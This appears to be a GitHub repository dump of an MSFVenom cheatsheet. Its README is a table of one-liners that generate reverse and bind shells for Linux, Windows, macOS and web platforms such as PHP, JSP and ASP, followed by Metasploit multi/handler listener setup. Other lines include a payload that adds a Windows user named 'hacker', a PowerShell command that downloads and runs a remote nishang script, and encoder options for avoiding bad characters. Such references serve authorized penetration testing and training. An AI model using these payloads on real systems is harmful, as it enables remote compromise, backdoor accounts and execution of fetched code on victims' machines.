├── MSF Venom Cheatsheet.docx
├── MSF Venom Cheatsheet.pdf
└── README.md

/MSF Venom Cheatsheet.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/frizb/MSF-Venom-Cheatsheet/6650b4bc2d17cf788718abb732e0c43c2b1a6f72/MSF Venom Cheatsheet.docx

--------------------------------------------------------------------------------
/MSF Venom Cheatsheet.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/frizb/MSF-Venom-Cheatsheet/6650b4bc2d17cf788718abb732e0c43c2b1a6f72/MSF Venom Cheatsheet.pdf

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# MSFVenom Cheatsheet
Single-page cheatsheet for common MSFVenom one-liners.
Available in PDF, DOCX and Markdown format!
*PDF and DOCX versions contain the payload size in bytes and a few more commands.*

| MSFVenom Payload Generation One-Liner | Description |
|---|---|
| msfvenom -l payloads | List available payloads |
| msfvenom -p PAYLOAD --list-options | List payload options |
| msfvenom -p PAYLOAD -e ENCODER -f FORMAT -i ENCODE COUNT LHOST=IP | Payload Encoding |
| msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf | Linux Meterpreter reverse shell x86 multi stage |
| msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf | Linux Meterpreter bind shell x86 multi stage |
| msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf | Linux bind shell x64 single stage |
| msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf | Linux reverse shell x64 single stage |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe | Windows Meterpreter reverse shell |
| msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe | Windows Meterpreter HTTP reverse shell |
| msfvenom -p windows/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f exe > shell.exe | Windows Meterpreter bind shell |
| msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe | Windows CMD Multi Stage |
| msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe | Windows CMD Single Stage |
| msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe | Windows add user |
| msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho > shell.macho | Mac Reverse Shell |
| msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho > shell.macho | Mac Bind shell |
| msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.py | Python Shell |
| msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw > shell.sh | BASH Shell |
| msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.pl | PERL Shell |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.asp | ASP Meterpreter shell |
| msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.jsp | JSP Shell |
| msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war > shell.war | WAR Shell |
| msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.php && cat shell.php \| pbcopy && echo '<?php ' \| tr -d '\n' > shell.php && pbpaste >> shell.php | PHP Meterpreter Shell |
| msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.php | PHP Reverse Shell |
| msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \\"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\\"" -f python | Windows Exec Nishang PowerShell in Python |
| msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x04\xA0" | Bad characters shikata_ga_nai |
| msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/fnstenv_mov -b "\x04\xA0" | Bad characters fnstenv_mov |

# Multihandler Listener
To get multiple sessions on a single multi/handler, set the ExitOnSession option to false and run `exploit -j` instead of just `exploit`. For example, for the meterpreter/reverse_tcp payload:
```
msf>use exploit/multi/handler
msf>set payload windows/meterpreter/reverse_tcp
msf>set lhost IP
msf>set lport PORT
msf>set ExitOnSession false
msf>exploit -j
```
The -j option runs the handler as a job, keeping all the connected sessions in the background.


# References

https://kb.help.rapid7.com/discuss/598ab88172371b000f5a4675
https://thor-sec.com/cheatsheet/oscp/msfvenom_cheat_sheet/
http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/

--------------------------------------------------------------------------------